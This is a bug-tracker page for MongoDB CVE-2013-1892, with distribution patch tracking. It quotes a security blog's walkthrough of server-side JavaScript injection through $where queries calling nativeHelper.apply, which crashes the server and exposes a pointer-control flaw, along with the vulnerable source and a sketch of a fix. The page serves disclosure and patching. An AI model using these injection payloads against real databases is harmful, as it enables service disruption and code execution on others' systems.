Unchecked access to SpiderMonkey’s JavaScript nativeHelper function

Bug #1160893 reported by James Page
Affects            Status        Importance  Assigned to  Milestone
mongodb (Debian)   Fix Released  Unknown
mongodb (Fedora)   Fix Released  High
mongodb (Ubuntu)   Fix Released  High        James Page
  Precise          Fix Released  High        Unassigned

Bug Description

Unchecked access to SpiderMonkey’s JavaScript nativeHelper function. See SERVER-9124; fix available in 2.2.4, 2.4.2, and 2.0.9.

https://jira.mongodb.org/browse/SERVER-9124

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

SCRT Information Security reports:

mongodb – SSJI to RCE
Posted on March 24, 2013 by agixid
Lucky discovery

Trying some server side JavaScript injection in mongodb, I wondered if it would be possible to pop a shell.
The run method seems good for this:

> run("uname","-a")
Sun Mar 24 07:09:49 shell: started program uname -a
sh1838| Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux
0
Unfortunately, this command is only effective in the mongo client:

> db.my_collection.find({$where:"run('ls')"})
error: {
 "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run is not defined nofile_a:0",
 "code" : 10071
}
But let’s dig a little bit.

> run
function () {
    return nativeHelper.apply(run_, arguments);
}
So you can run the "run" function directly by calling nativeHelper.apply(run_,["uname","-a"]);
On the server side, the result shows us that the nativeHelper.apply method exists!

> db.my_collection.find({$where:'nativeHelper.apply(run_, ["uname","-a"]);'})
error: {
       "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run_ is not defined nofile_a:0",
       "code" : 10071
}
So what’s run_?
> run_
{ "x" : 135246144 }
An associative array; can we use it on the server side?

> db.my_collection.find({$where:'nativeHelper.apply({"x":135246144}, ["uname","-a"]);'})
Sun Mar 24 07:15:26 DBClientCursor::init call() failed
Sun Mar 24 07:15:26 query failed : sthack.my_collection { $where: "nativeHelper.apply({"x":135246144}, ["uname","-a"]);" } to: 127.0.0.1:27017
Error: error doing query: failed
Sun Mar 24 07:15:26 trying reconnect to 127.0.0.1:27017
Sun Mar 24 07:15:26 reconnect 127.0.0.1:27017 failed couldn't connect to server 127.0.0.1:27017
The server crashed \o/ !

Let’s check the source code:
./src/mongo/scripting/engine_spidermonkey.cpp

JSBool native_helper( JSContext *cx , JSObject *obj , uintN argc, jsval *argv , jsval *rval ) {
        try {
            Convertor c(cx);
            NativeFunction func = reinterpret_cast<NativeFunction>(
                    static_cast<long long>( c.getNumber( obj , "x" ) ) );
            void* data = reinterpret_cast<void*>(
                    static_cast<long long>( c.getNumber( obj , "y" ) ) );
            verify( func );

            BSONObj a;
            if ( argc > 0 ) {
                BSONObjBuilder args;
                for ( uintN i = 0; i < argc; ++i ) {
                    c.append( args , args.numStr( i ) , argv[i] );
                }
                a = args.obj();
            }

            BSONObj out;
            try {
                out = func( a, data );
            }
            catch ( std::exception& e ) {
nativeHelper is a crazy feature in SpiderMonkey misused by mongodb:
the NativeFunction func comes from the "x" JavaScript object and is then called without any check!!!

> db.my_collection.find({$where:'nativeHelper.apply({"x":0x31337}, ["uname","-a"]);'})

Sun Mar 24 07:20:03 Invalid access at address: 0x31337 from thread: conn1
Sun Mar 24 07:20:03 Got signal: 11 (Segmentation fault).

External references:
http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/

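The pattern the post above describes (a script-controlled number reinterpreted as a code pointer) next to the "avoid raw pointers" idea named in the Ubuntu changelog, sketched in C. This is an added illustration, not MongoDB's code; the native_fn type, the REGISTRY table and the call_unchecked/call_checked functions are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed illustration, not MongoDB's code: a native helper that takes
 * the script-visible "x" number and decides what native code to call. */
typedef int (*native_fn)(const char *arg);

/* Stand-in native function (hypothetical): returns the argument's length. */
static int echo_len(const char *arg) { return (int)strlen(arg); }

/* Vulnerable pattern, as in the quoted engine_spidermonkey.cpp: the number
 * from script is cast straight to a function pointer and invoked, so any
 * script-supplied value becomes the call target (the page's 0x31337 case). */
static int call_unchecked(double x, const char *arg) {
    native_fn f = (native_fn)(uintptr_t)(long long)x;
    return f ? f(arg) : -1;
}

/* Hardened pattern (the "avoid raw pointers" idea from the changelog):
 * "x" is an opaque index into a fixed registry of trusted natives, so script
 * can only select a function the engine registered, never a raw address. */
static const native_fn REGISTRY[] = { echo_len };
#define REGISTRY_SIZE (sizeof REGISTRY / sizeof REGISTRY[0])

static int call_checked(double x, const char *arg) {
    /* Range-check before any integer conversion; this also rejects NaN,
     * negatives and values too large to convert without undefined behaviour. */
    if (!(x >= 0.0) || !(x < (double)REGISTRY_SIZE))
        return -1;
    size_t idx = (size_t)x;
    if ((double)idx != x)            /* reject fractional "indices" */
        return -1;
    return REGISTRY[idx](arg);
}
```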
Revision history for this message
In , Troy (troy-redhat-bugs) wrote :

Has this been tried on Fedora's mongodb?
I ask because we use V8 instead of SpiderMonkey, but I'm not positive that our version of mongodb didn't get something slipped in.

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Created mongodb tracking bugs for this issue

Affects: epel-all [bug 928192]

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Created mongodb tracking bugs for this issue

Affects: fedora-all [bug 928193]

Revision history for this message
In , Jan (jan-redhat-bugs) wrote :
James Page (james-page)
Changed in mongodb (Ubuntu):
importance: Undecided → High
status: New → Triaged
Revision history for this message
James Page (james-page) wrote :

Security update for 12.04

Changed in mongodb (Ubuntu Precise):
importance: Undecided → High
Changed in mongodb (Ubuntu):
assignee: nobody → James Page (james-page)
James Page (james-page)
Changed in mongodb (Ubuntu Precise):
status: New → Triaged
Changed in mongodb (Debian):
status: Unknown → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mongodb - 1:2.2.4~rc0-0ubuntu1

---------------
mongodb (1:2.2.4~rc0-0ubuntu1) raring; urgency=low

  * New upstream bugfix release:
    - Includes fix for JavaScript remote code execution security
      issue (LP: #1160893).
      CVE-2013-1892
 -- James Page <email address hidden> Thu, 28 Mar 2013 09:13:20 +0000

Changed in mongodb (Ubuntu):
status: Triaged → Fix Released
Revision history for this message
Aaron Stone (sodabrew) wrote :

Will there be packages built for Lucid, Oneiric, and Precise that are within their support windows?

Revision history for this message
Jamie Strandboge (jdstrand) wrote :

debdiff looks good. Testsuite passes and the build logs look good. Thanks James! Uploaded to the security PPA. I will push out when it finishes building.

Changed in mongodb (Ubuntu Precise):
status: Triaged → Fix Committed
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mongodb - 1:2.0.4-1ubuntu2.1

---------------
mongodb (1:2.0.4-1ubuntu2.1) precise-security; urgency=low

  * SECURITY UPDATE: Remote code execution vulnerability in Spidermonkey
    JavaScript engine (LP: #1160893).
    - d/p/CVE-2013-1892.1.patch: Avoid raw pointers for SM's nativeHelper.
      Cherry picked from upstream VCS.
    - d/p/CVE-2013-1892.2.patch: Cast id to double before converting to
      JS. Cherry picked from upstream VCS.
    - https://jira.mongodb.org/browse/SERVER-9124
    - CVE-2013-1892
 -- James Page <email address hidden> Thu, 28 Mar 2013 10:04:28 +0000

Changed in mongodb (Ubuntu Precise):
status: Fix Committed → Fix Released
Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Removed due to typo.

Revision history for this message
In , errata-xmlrpc (errata-xmlrpc-redhat-bugs) wrote :

This issue has been addressed in following products:

  MRG for RHEL-6 v.2

Via RHSA-2013:1170 https://rhn.redhat.com/errata/RHSA-2013-1170.html

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Red Hat Update Infrastructure 2.1.3 is now in Production 2 Phase of the support and maintenance life cycle. This has been rated as having Important security impact, however as used in RHUI this issue is not exposed to untrusted users, as such it is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Update Infrastructure Life Cycle: https://access.redhat.com/support/policy/updates/rhui.

Changed in mongodb (Fedora):
importance: Unknown → High
status: Unknown → Fix Released